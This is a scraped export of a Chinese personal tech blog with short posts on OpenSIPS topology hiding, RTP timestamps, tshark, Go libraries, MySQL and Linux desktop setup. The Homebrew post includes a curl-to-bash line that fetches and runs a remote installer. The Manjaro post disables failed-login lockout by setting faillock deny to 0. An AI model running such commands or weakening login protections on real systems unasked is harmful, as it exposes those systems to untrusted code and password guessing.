is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { t_relay(); exit; } else exit; } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } } 2.3 注意事项 如果用了拓扑隐藏,就不要用record_route()或record_route_preset()去设置Record-Route头了,否则SIP消息将会在sip server上一直循环发送。\n4. 参考文档 https://www.opensips.org/Documentation/Tutorials-Topology-Hiding https://opensips.org/html/docs/modules/2.1.x/topology_hiding.html#idp256096 ","permalink":"https://wdd.js.org/opensips/ch8/topology-hiding/","summary":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 
脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.","title":"拓扑隐藏学习以及实践"},{"content":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","permalink":"https://wdd.js.org/posts/2022/03/sny4rb/","summary":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","title":"github clone加速"},{"content":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 
这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经有了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译到底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","permalink":"https://wdd.js.org/posts/2022/03/tcpdump/","summary":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,它还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory)实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经有了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译到底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","title":"[未完成] 浪潮之底系列 - tcpdump的故事"},{"content":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音流相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 
Use the -q option if you’re reading a capture file and only want the statistics printed, not any per-packet information. Statistics are calculated independently of the normal per-packet output, unaffected by the main display filter. However, most have their own optional filter parameter, and only packets that match that filter (and any capture filter or read filter) will be used in the calculations. Note that the -z proto option is different - it doesn’t cause statistics to be gathered and printed when the capture is complete, it modifies the regular packet summary output to include the values of fields specified with the option. Therefore you must not use the -q option, as that option would suppress the printing of the regular packet summary output, and must also not use the -V option, as that would cause packet detail information rather than packet summary information to be printed. tshark -z help可以打\ntshark -z help 常用的\n-z conv,tcp-z conv,ip-z conv,udp-z endpoints,type[,filter]-z expert,sip-z sip,stat-z ip_hosts,tree-z rtp,streams\n","permalink":"https://wdd.js.org/opensips/tools/tshark/","summary":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 
2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.","title":"tshark 快速分析语音流问题"},{"content":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。\n","permalink":"https://wdd.js.org/posts/2020/02/yva0h1/","summary":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。","title":"为什么我又开始使用Firefox浏览器"},{"content":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。\n","permalink":"https://wdd.js.org/posts/2022/02/","summary":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. 
graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。","title":"有意思的命令行工具"},{"content":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","permalink":"https://wdd.js.org/opensips/ch5/sql-table/","summary":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql 
b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","title":"mysql建表语句"},{"content":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。\n","permalink":"https://wdd.js.org/posts/2022/01/","summary":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。","title":"manjaro kde 之旅"},{"content":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback. Examples of synchronization sources include the sender of a stream of packets derived from a signal source such as a microphone or a camera, or an RTP mixer (see below). A synchronization source may change its data format, e.g., audio encoding, over time. The SSRC identifier is a randomly chosen value meant to be globally unique within a particular RTP session (see Section 8). 
A participant need not use the same SSRC identifier for all the RTP sessions in a multimedia session; the binding of the SSRC identifiers is provided through RTCP (see Section 6.5.1). If a participant generates multiple streams in one RTP session, for example from separate video cameras, each MUST be identified as a different SSRC.\nThe first twelve octets are present in every RTP packet, while the list of CSRC identifiers is present only when inserted by a mixer. The fields have the following meaning:\nversion (V): 2 bits This field identifies the version of RTP. The version defined by this specification is two (2). (The value 1 is used by the first draft version of RTP and the value 0 is used by the protocol initially implemented in the \u0026ldquo;vat\u0026rdquo; audio tool.)\npadding (P): 1 bit If the padding bit is set, the packet contains one or more additional padding octets at the end which are not part of the payload. The last octet of the padding contains a count of how many padding octets should be ignored, including itself. Padding may be needed by some encryption algorithms with fixed block sizes or for carrying several RTP packets in a lower-layer protocol data unit.\nextension (X): 1 bit If the extension bit is set, the fixed header MUST be followed by exactly one header extension, with a format defined in Section 5.3.1.\nCSRC count (CC): 4 bits The CSRC count contains the number of CSRC identifiers that follow the fixed header.\nmarker (M): 1 bit The interpretation of the marker is defined by a profile. It is intended to allow significant events such as frame boundaries to be marked in the packet stream. A profile MAY define additional marker bits or specify that there is no marker bit by changing the number of bits in the payload type field (see Section 5.3).\npayload type (PT): 7 bits This field identifies the format of the RTP payload and determines its interpretation by the application. 
A profile MAY specify a default static mapping of payload type codes to payload formats. Additional payload type codes MAY be defined dynamically through non-RTP means (see Section 3). A set of default mappings for audio and video is specified in the companion RFC 3551 [1]. An RTP source MAY change the payload type during a session, but this field SHOULD NOT be used for multiplexing separate media streams (see Section 5.2). A receiver MUST ignore packets with payload types that it does not understand.\nsequence number: 16 bits The sequence number increments by one for each RTP data packet sent, and may be used by the receiver to detect packet loss and to restore packet sequence. The initial value of the sequence number SHOULD be random (unpredictable) to make known-plaintext attacks on encryption more difficult, even if the source itself does not encrypt according to the method in Section 9.1, because the packets may flow through a translator that does. Techniques for choosing unpredictable numbers are discussed in [17].\ntimestamp: 32 bits 最重要的就是这个字段,需要认真理解。\ntimestamp的初始值是一个随机值,而不是linux时间戳 timestamp反映的是rtp采样数据的第一个字节的采样时刻 对于相同的rtp流来说,timestamp总是线性按照固定的长度增长,一般是160。采样频率一般是8000hz, 也就是说1秒会有8000个样本数据,每个样本占用1个字节。发送方一般每隔20毫秒发送一个20毫秒内的所有采样数据。那么一秒钟发送方会发送1000/20=50个RTP包,50个数据包发送8000个采样数据,平均每个数据包携带8000/50=160个字节的数据。所以timestamp的增量一般是160, 在wireshark上抓包,可以看到rtp流的time字段是按照160的步长在增加。 然后我们分析单个的RTP流,从IP层可以看出UDP payload是172个字节,实际上就是rtp的采样数据160 + RTP的固定的12字节的头部 但是也有时候, timestamp也并不是总是按照固定的步长在增长,例如下图,3166508092的下一个包的Time字段突然变成1307389520了。这种情况比较特殊,一般是多个不同SSRC的语音流在经过同一个SBC时,SSRC被修改成相同的值,但是timestamp字段是原样保留的。导致发出的RTP流timestamp字段不再连续。在wireshark的流分析上,也能看出出现了不正常的timestamp。这种不正常的timestamp对于某些sipua来说,它可能会忽略不连续的所有后续的RTP包,进而导致无法放音的问题。我就曾遇到过fs类似的问题,一个解决方案是升级fs, 另一个方案是试着将fs的rtp_rewrite_timestamps通道变量设置为true。https://freeswitch.org/confluence/display/FREESWITCH/rtp_rewrite_timestamps The timestamp reflects the sampling instant of the first octet in the RTP data packet.
The sampling instant MUST be derived from a clock that increments monotonically and linearly in time to allow synchronization and jitter calculations (see Section 6.4.1). The resolution of the clock MUST be sufficient for the desired synchronization accuracy and for measuring packet arrival jitter (one tick per video frame is typically not sufficient). The clock frequency is dependent on the format of data carried as payload and is specified statically in the profile or payload format specification that defines the format, or MAY be specified dynamically for payload formats defined through non-RTP means. If RTP packets are generated periodically, the nominal sampling instant as determined from the sampling clock is to be used, not a reading of the system clock. As an example, for fixed-rate audio the timestamp clock would likely increment by one for each sampling period. If an audio application reads blocks covering 160 sampling periods from the input device, the timestamp would be increased by 160 for each such block, regardless of whether the block is transmitted in a packet or dropped as silent. The initial value of the timestamp SHOULD be random, as for the sequence number. Several consecutive RTP packets will have equal timestamps if they are (logically) generated at once, e.g., belong to the same video frame. Consecutive RTP packets MAY contain timestamps that are not monotonic if the data is not transmitted in the order it was sampled, as in the case of MPEG interpolated video frames. (The sequence numbers of the packets as transmitted will still be monotonic.) RTP timestamps from different media streams may advance at different rates and usually have independent, random offsets. Therefore, although these timestamps are sufficient to reconstruct the timing of a single stream, directly comparing RTP timestamps from different media is not effective for synchronization. 
Instead, for each medium the RTP timestamp is related to the sampling instant by pairing it with a timestamp from a reference clock (wallclock) that represents the time when the data corresponding to the RTP timestamp was sampled. The reference clock is shared by all media to be synchronized. The timestamp pairs are not transmitted in every data packet, but at a lower rate in RTCP SR packets as described in Section 6.4. The sampling instant is chosen as the point of reference for the RTP timestamp because it is known to the transmitting endpoint and has a common definition for all media, independent of encoding delays or other processing. The purpose is to allow synchronized presentation of all media sampled at the same time. Applications transmitting stored data rather than data sampled in real time typically use a virtual presentation timeline derived from wallclock time to determine when the next frame or other unit of each medium in the stored data should be presented. In this case, the RTP timestamp would reflect the presentation time for each unit. That is, the RTP timestamp for each unit would be related to the wallclock time at which the unit becomes current on the virtual presentation timeline. Actual presentation occurs some time later as determined by the receiver. An example describing live audio narration of prerecorded video illustrates the significance of choosing the sampling instant as the reference point. In this scenario, the video would be presented locally for the narrator to view and would be simultaneously transmitted using RTP. The \u0026ldquo;sampling instant\u0026rdquo; of a video frame transmitted in RTP would be established by referencing\nits timestamp to the wallclock time when that video frame was presented to the narrator. The sampling instant for the audio RTP packets containing the narrator\u0026rsquo;s speech would be established by referencing the same wallclock time when the audio was sampled. 
The audio and video may even be transmitted by different hosts if the reference clocks on the two hosts are synchronized by some means such as NTP. A receiver can then synchronize presentation of the audio and video packets by relating their RTP timestamps using the timestamp pairs in RTCP SR packets.\nSSRC: 32 bits The SSRC field identifies the synchronization source. This identifier SHOULD be chosen randomly, with the intent that no two synchronization sources within the same RTP session will have the same SSRC identifier. An example algorithm for generating a random identifier is presented in Appendix A.6. Although the probability of multiple sources choosing the same identifier is low, all RTP implementations must be prepared to detect and resolve collisions. Section 8 describes the probability of collision along with a mechanism for resolving collisions and detecting RTP-level forwarding loops based on the uniqueness of the SSRC identifier. If a source changes its source transport address, it must also choose a new SSRC identifier to avoid being interpreted as a looped source (see Section 8.2).\nCSRC list: 0 to 15 items, 32 bits each The CSRC list identifies the contributing sources for the payload contained in this packet. The number of identifiers is given by the CC field. If there are more than 15 contributing sources, only 15 can be identified. CSRC identifiers are inserted by mixers (see Section 7.1), using the SSRC identifiers of contributing sources. 
For example, for audio packets the SSRC identifiers of all sources that were mixed together to create a packet are listed, allowing correct talker indication at the receiver.\n参考文档 http://www.rfcreader.com/#rfc3550 http://www.rfcreader.com/#rfc1889 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-timestamp/","summary":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback.","title":"RTP 不连续的timestamp和SSRC"},{"content":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C\n","permalink":"https://wdd.js.org/posts/2021/12/","summary":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 
主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C","title":"开源免费的ssh终端工具"},{"content":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","permalink":"https://wdd.js.org/posts/2021/11/","summary":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","title":"使用brew作为deepin的包管理工具"},{"content":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 
https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go\n","permalink":"https://wdd.js.org/golang/my-start-repo/","summary":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go","title":"我常用的第三方库"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. 
Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/golang/mysql-placeholder/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能如实呈现用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不会一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;替换成一个中文破折号
